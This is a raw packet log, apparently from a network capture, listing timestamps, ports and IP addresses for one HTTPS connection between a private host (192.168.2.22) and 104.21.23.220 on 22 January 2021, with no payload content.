Jan 22, 2021 17:25:14.211013079 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.252749920 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.252804041 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.252844095 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.252871037 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.252906084 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.252933025 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.252969027 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253005981 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253036022 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253047943 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253076077 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253082037 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253088951 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253088951 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253107071 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253118038 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253151894 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253156900 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253170013 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253195047 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253218889 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253223896 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253257990 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253264904 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253274918 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253314972 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253324032 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253360033 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253380060 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253417969 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253434896 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253473997 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253500938 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253515005 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253525019 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253546953 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253576040 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253583908 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253618002 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253635883 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253640890 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253681898 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253707886 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253731012 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253748894 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253772974 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253798008 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253810883 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253832102 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253849983 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253850937 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253886938 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253920078 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253925085 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253952026 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.253964901 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.253968000 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254004002 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254033089 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254051924 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254065990 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254092932 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254096985 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254158020 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254194975 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254235029 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254261017 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254271984 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254287958 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254314899 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254329920 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254352093 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254374027 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254400969 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254404068 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254443884 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254470110 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254482031 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254496098 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254520893 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254539013 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254559994 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254580975 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254605055 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254626036 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254640102 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.254667997 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.254693985 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.255201101 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.274841070 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.274902105 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.274960041 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.274991035 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.275027990 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.275059938 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.275115967 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.275124073 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.275129080 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.275132895 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315385103 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315501928 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315570116 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315627098 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315696955 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315696955 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315735102 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315740108 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315743923 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315757990 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315798998 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315815926 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315823078 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315877914 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.315911055 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315932035 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.315948963 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316014051 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316021919 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316083908 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316090107 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316143990 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316152096 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316209078 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316211939 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316267014 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316272020 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316329002 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316329002 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316382885 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316391945 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316447973 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316459894 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316518068 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316530943 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316586018 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316595078 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316653013 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316659927 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316719055 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316725016 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316781998 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316786051 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316839933 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316848040 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316900969 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316909075 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.316963911 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.316975117 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317035913 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317045927 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317101955 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317106962 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317212105 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317606926 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317653894 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317683935 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317692041 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317712069 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317730904 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317749023 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317773104 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317796946 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317810059 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317822933 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317857981 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317862034 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317909002 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.317914009 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.317965031 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318485975 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318569899 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318617105 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318631887 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318655014 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318669081 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318702936 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318706036 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318746090 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318756104 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318784952 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318799973 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318835974 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318877935 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318919897 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318933964 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318958998 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.318968058 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.318995953 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319010019 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319045067 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319046021 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319088936 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319097042 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319125891 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319139957 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319164991 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319175005 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319204092 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319216967 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319241047 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319252968 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319274902 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.319310904 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.319324970 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.324275970 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.359318018 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.359611988 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360126019 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360172987 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360213995 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360217094 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360251904 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360260963 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360268116 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360291958 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360305071 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360331059 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360344887 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360378981 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360379934 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360424042 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360433102 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360460997 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360476971 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360501051 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360515118 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360538960 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360553026 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360577106 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360605955 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360624075 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360632896 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360672951 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360719919 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360735893 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360764027 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360783100 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360800982 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360816002 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360840082 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360847950 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360877991 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360892057 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360914946 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360924006 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360954046 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.360963106 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.360991955 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361001968 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361037970 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361041069 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361085892 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361089945 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361125946 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361134052 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361165047 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361175060 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361205101 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361212015 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361243010 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361251116 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361283064 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361291885 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361323118 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361329079 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361370087 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361370087 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361421108 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361448050 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361486912 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361494064 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361519098 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.361531973 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361563921 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.361771107 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.364234924 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.364310980 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374521971 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374623060 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374697924 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374706030 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374716043 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374742985 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374758005 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374783993 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374814987 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374824047 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374831915 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374862909 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374876976 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374902010 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374916077 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374941111 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374954939 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.374979019 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.374990940 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.375046968 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.375049114 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.375087976 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.375096083 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.375118971 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.375139952 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.375166893 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.375169039 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.375211000 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.375216961 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.375268936 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400032997 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400089979 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400130987 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400171041 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400208950 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400248051 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400285959 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400333881 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400341034 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400372982 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400377989 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400378942 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400383949 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400388956 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400393009 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400417089 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400422096 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400456905 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400480032 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400495052 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400496960 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400532007 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400552034 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400571108 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400572062 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400626898 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400631905 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400675058 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400691032 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400718927 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 17:25:14.400737047 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 17:25:14.400759935 CET	443	49165	104.21.23.220	192.168.2.22
